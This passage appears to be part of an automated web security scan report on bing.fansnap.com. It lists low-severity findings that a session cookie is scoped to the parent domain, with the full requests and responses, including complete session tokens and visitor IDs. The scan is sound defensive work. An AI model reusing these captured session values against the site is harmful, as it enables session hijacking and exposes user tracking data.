_fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BH%2FkqNBjoLb2Zmc2V0af6QnQ%3D%3D--976c30f9ab045a1cfd33499b88aa515a33432d71; domain=fansnap.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DolT2MBjoLb2Zmc2V0af6QnQ%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

13.6. http://bing.fansnap.com/checkout/index/418563179 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://bing.fansnap.com
Path:	/checkout/index/418563179

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4CWdhqOBjoLb2Zmc2V0af6QnQ%3D%3D--8f0f6d1603aea2d08c675430159ed90f71b0f19d; domain=fansnap.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

13.7. http://bing.fansnap.com/la/pi previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://bing.fansnap.com
Path:	/la/pi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4Ds26SGBjoLb2Zmc2V0af6QnQ%3D%3D--ce90378291811242432536859c5946b358b7b028; domain=fansnap.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /la/pi?m=_uid%3D-776896836%3A1342566830275585%3Apgstickets%7C%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%26_ctx%3D%26_ts%3D1311100420%26_st%3D%26_ma%3D13%26_ref%3Dhttp%253A%252F%252Fwww.bing.com%252Fevents%252Fsearch%253Fq%253DU2%252Bwith%252BInterpol%252B%2528rescheduled%252Bfrom%252B7%25252f19%2529%2526p1%253D%255BEvents%252520source%253D%252522vertical%252522%252Bqzeventid%253D%252522f389669%252522%255D%2526FORM%253DDTPEVE HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BLXYWGBjoLb2Zmc2V0af6QnQ%3D%3D--512a0ae45b8038b810373fbf6aa82948b14c77d0; POOLID=B

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:33:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
Content-Disposition: inline; filename="ra.gif"
Content-Transfer-Encoding: binary
Cache-Control: private
X-Runtime: 11
ETag: "db04c7b378cb2db912c3ba8a5a774ee3"
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4Ds26SGBjoLb2Zmc2V0af6QnQ%3D%3D--ce90378291811242432536859c5946b358b7b028; domain=fansnap.com; path=/; HttpOnly
Content-Length: 43
Status: 200
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.8. http://bing.fansnap.com/la/seats-uet previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://bing.fansnap.com
Path:	/la/seats-uet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4CKjxeKBjoLb2Zmc2V0af6QnQ%3D%3D--84e3834079e7b25bf0922de612ae40f39c83b91e; domain=fansnap.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /la/seats-uet?m=_uid%3D-776896836%3A7925%3Apgstickets%26_ctx%3Dmt%3Aint%3Bsz%3A1254%3Bid%3A389669%26_cnt%3D1%26_st%3D%26ts%3D1311100477222%26ev%3Dsection-hover%3B89185%26ev%3Dsection-hover%3B89267%26ts%3D1311100478810%26&ch=bing HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4B2dJOHBjoLb2Zmc2V0af6QnQ%3D%3D--8a1ac49a36095f4dbcf7a97d829c4d094b2f91ed

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:34:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
Cache-Control: no-cache
X-Runtime: 5
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4CKjxeKBjoLb2Zmc2V0af6QnQ%3D%3D--84e3834079e7b25bf0922de612ae40f39c83b91e; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 1
Connection: close
Content-Type: text/html; charset=utf-8

13.9. http://bing.fansnap.com/seats/ajax/get_row_data previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://bing.fansnap.com
Path:	/seats/ajax/get_row_data

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4D5MReHBjoLb2Zmc2V0af6QnQ%3D%3D--bd9b40f18e2d6dc1d8e22c6446686fa9fe2c928f; domain=fansnap.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /seats/ajax/get_row_data?event_ids[]=389669&use_ids=true&abppc=false&bfl=true&ps=false&ugc_enabled=true&exclude_brokers=629&map_type=interactive&get_geom=true&get_row=false HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
X-Requested-With: XMLHttpRequest
